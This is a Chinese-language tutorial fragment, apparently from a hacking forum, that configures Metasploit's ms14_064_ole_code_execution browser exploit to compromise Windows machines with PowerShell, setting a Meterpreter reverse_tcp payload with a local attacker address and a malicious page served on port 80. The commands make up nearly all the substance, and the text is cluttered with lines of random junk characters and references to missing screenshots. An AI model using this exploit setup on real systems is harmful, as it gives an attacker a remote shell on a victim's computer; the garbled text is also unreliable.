' S* B# @( u/ b) Q c% a$ U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示# E6 a8 A9 w7 P2 w2 n
. X B! H. p2 D& B' p' V* X
: c5 p! o q/ ~
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
$ R L2 i+ R. P/ S: d5 `! q( n/ w2 N
- x# W" r6 r/ M. W5 C4 f# }
6 X$ f J8 ~% T' E7 E. K4 r 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
1 f. @5 S3 a+ U, F6 a
6 W) y" x- d" {1 ^1 f) r
" G8 ~* l0 |0 \* ]! z set AllowPowershellPrompt true6 |# Q# Y# Y) {5 ~# b- N1 i5 r
7 F$ `* b: y2 ~8 U2 Q7 B
~8 z9 h7 _. s" M0 u% R% K
Set LHOST 192.168.0.109
0 D5 Q7 [0 ^5 S/ u/ S
Q$ a8 G8 S) h A9 o- b8 l+ m: X; e
set SRVHOST 192.168.0.109
& X$ E3 N4 K/ l8 M o" G
7 ~3 F8 f4 R! P3 x
# Y1 `$ t7 f, k, I% U/ y1 S( c
Set uripath share
1 T5 n0 b1 v& j1 A6 ^
& R1 T& J, e! J' |4 ~0 O
- A' I5 |; K" s' ? Set srvport 80" e2 m/ z( @' ^6 }1 G' @
0 @' v" o* q& h* d. L, i: o/ _1 m/ p: N8 s0 P+ B1 }" [; E2 Y$ a
: H) f* z8 S n) v
- G8 w- I) K3 Y! `( T, G" S0 ]
+ i, F$ h) r2 \& D1 D
5 _0 _$ k7 m$ K3 ~# j) z+ x/ J
* C0 r, s p+ Q
' \ v0 Y v2 P& j/ Q0 ^: l
' i" u: a% M" @: J
3 s( J" C+ d. o' v! G$ H5 G
+ B- R- |4 K6 y1 K8 R$ s
|! u) v" i- I9 W
% a" z+ [( t8 K" h7 K
- G- p: L K6 e- d- \ 4 t1 D. g) d, p. F
. W! G2 t1 {, d& ~4 f
, f' B6 k5 a/ h) o5 e 下面我们来访问本地地址如图:+ `) L( P% W& e3 q: U2 l2 i) P
3 [! @8 w1 A6 Q ^- T! d. Y! Z
) T/ F6 F0 F# Q* ?
) B8 D- u7 H; N7 J
( H5 r, p9 n9 U5 b
9 a9 R0 z+ G# G; O) P. n% d% ?: T
. D1 X$ {, ]8 E Y
4 K1 B; L" q, E. M$ R' h
5 E+ t% W& {' b# [: p
B3 W/ d: t3 \; s) z% Q4 {/ b3 B( f/ A